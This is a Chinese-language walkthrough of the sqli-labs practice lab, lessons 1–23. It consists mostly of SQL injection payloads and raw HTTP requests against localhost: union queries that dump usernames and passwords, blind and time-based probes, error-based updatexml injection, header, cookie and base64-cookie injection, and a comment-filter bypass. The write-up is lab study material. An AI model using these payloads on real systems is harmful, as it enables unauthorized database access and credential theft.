sqli-labs Less-1~~~Less-23
Less-1
payload:'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第一关正规的字符型SQL注入,单引号报错,常规注入即可
Less-2
payload:+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第二关数字型SQL注入,直接跟payload即可,通过and 1=1 ,and 1=2发现注入点
Less-3
payload:')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第三关为小括号包裹的字符型注入,发现注入点之后使用payload即可
Less-4
payload:")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第四关为小括号包裹的字符型注入
Less-5
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
布尔盲注脚本:https://www.cnblogs.com/Spec/p/10648793.html
此脚本只将数据库爆出,具体还需要自己更改。
Less-6
payload1(探测长度,以database()为例):"+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):"+and+(select+mid(database(),1,1)='s')--+
同第五关,脚本稍作更改也可使用
Less-7
payload1(探测长度,以database()为例):'))+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
时间盲注,通过if语句判断,争取则延时3秒,否则不延时。
Less-8
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
同第五关
Less-9
payload1(探测长度,以database()为例):'+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
同第七关,单引号字符型延时盲注
Less-10
payload1(探测长度,以database()为例):"+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):"+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
Less-11
payload:
POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
常规的post注入,万能密码等。
Less-12
payload:
POST /sqli-labs/Less-12/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-12/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110 uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-13
poc:
POST /sqli-labs/Less-13/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-13/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit
post类型的布尔盲注,密码处通过 or 来判断真假
Less-14
poc:
POST /sqli-labs/Less-14/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-14/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67 uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit
同第十三关
Less-15
payload:
POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-16
poc:
POST /sqli-labs/Less-16/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-16/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit
Less-17
poc:
POST /sqli-labs/Less-17/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-17/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100 uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit
报错注入,之前一直用这个payload:
select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
但一直都不对,知道读源码才知道对长度进行了限制,所以使用这个payload:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
发现报错成功。
Less-18
poc:
POST /sqli-labs/Less-18/ HTTP/1.1
Host: localhost
User-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or '
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-18/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit
看源码发现,是将User-Agent未过滤插入数据库中,此时构造报错注入:updatexml(1,concat(0x7e,(SELECT user()),0x7e),1),从而产生sql http头注入。
Less-19
poc:
POST /sqli-labs/Less-19/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit
同第十八关一样,不过登录进去时发现会将referer输出,于是修改referer的值,报错成功。
Less-20
poc:
GET /sqli-labs/Less-20/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=admin' and 1=2 union select user(),version(),database()--+
Connection: close
cookie注入,当登录进去时,发现会将User-Anget,referer,cookie输出到页面中,然后刷新,抓包,替换cookie为payload即可。
Less-21
poc:
GET /sqli-labs/Less-21/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw==
Connection: close
payload使用base64编码,并且注入点使用单引号和小括号包裹 ')
payload: admin') and 1=2 union select 1,username,password from security.users limit 0,1#
Less-22
poc:
GET /sqli-labs/Less-22/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA=
Connection: close
payload:admin" and 1=2 union select 1,username,password from security.users limit 0,1--
Less-23
payload: ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00
多次尝试基本确定 # 与 -- 是被过滤掉了的,于是尝试新的注释方法: ;%00 于是注释成功。
sqli-labs Less-1~~~Less-23的更多相关文章
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- SQL注入系列:SQLi Labs
前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- SQLI LABS Challenges Part(54-65) WriteUp
终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...
- SQLI LABS Stacked Part(38-53) WriteUp
这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...
- SQLI LABS Advanced Part(23-37) WriteUp
继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...
- Sqli labs系列-less-5&6 报错注入法(下)
我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...
随机推荐
- 怎么在Word上编辑数学公式?教你一招
在日常工作中我们常常会用到word来编辑文字.但是有时候也免不了要输入一些公式,尤其是数学.物理还有化学方面等较复杂的公式.这时候用word来编辑的话会很麻烦,很难编辑出来,那该怎么办呢? 我们都知道 ...
- iOS7使用iOS8上的方法报错处理
问题描述 我们经常会遇到在低版本上使用高版本方法导致的bug,例如: WebKit discarded an uncaught exception in the webView:decidePolic ...
- 精尽MyBatis源码分析 - MyBatis-Spring 源码分析
该系列文档是本人在学习 Mybatis 的源码过程中总结下来的,可能对读者不太友好,请结合我的源码注释(Mybatis源码分析 GitHub 地址.Mybatis-Spring 源码分析 GitHub ...
- python办公入门3:xlrd操作工作表
工作表 1 import xlrd 2 3 #接受工作表 4 data=xlrd.open_workbook("data.xlsx") 5 #查询第一个工作表的打开状态 6 pri ...
- Mat使用详解
背景 笔记中躺了很久的文章,今天用到Mat时发现之前写的内容还算清晰,分享出来; 如下所举例使用的dump文件是针对之前使用的ignite库溢出时的dump文件:关于ignite的概念此处不再叙述,本 ...
- flink:JobGraph生成过程分析
1.JobGraph是由StreamGraph转换而来,当client将StreamGraph提交后,job启动前会先完成转换,统一的转换入口如下: 2.StreamingJobGraphGenera ...
- 面试官问Linux下如何编译C程序,如何回答?为你编译演示
文章来源:嵌入式大杂烩 作者:ZhengNL Windows下常用IDE来编译,Linux下直接使用gcc来编译,编译过程是Linux嵌入式编程的基础,也是嵌入式高频基础面试问题. 一.命令行编译及各 ...
- 使用Python过程出现的细节问题:TypeError: not enough arguments for format string
今天使用字符串格式化时,遇到的一点小问题:调用这个方法解释器出错了:TypeError: not enough arguments for format string def ll(name,age) ...
- Linux服务器学习----haproxy+keepalived
实验需要4台虚拟机,两台做服务器,两台做代理服务器 www1:ip:10.30.40.11 hk1: 代理:10.30.40.13(hk1.netdj.net) www2:ip 10.3 ...
- LeetCode 028 Implement strStr()
题目要求:Implement strStr() Implement strStr(). Returns the index of the first occurrence of needle in h ...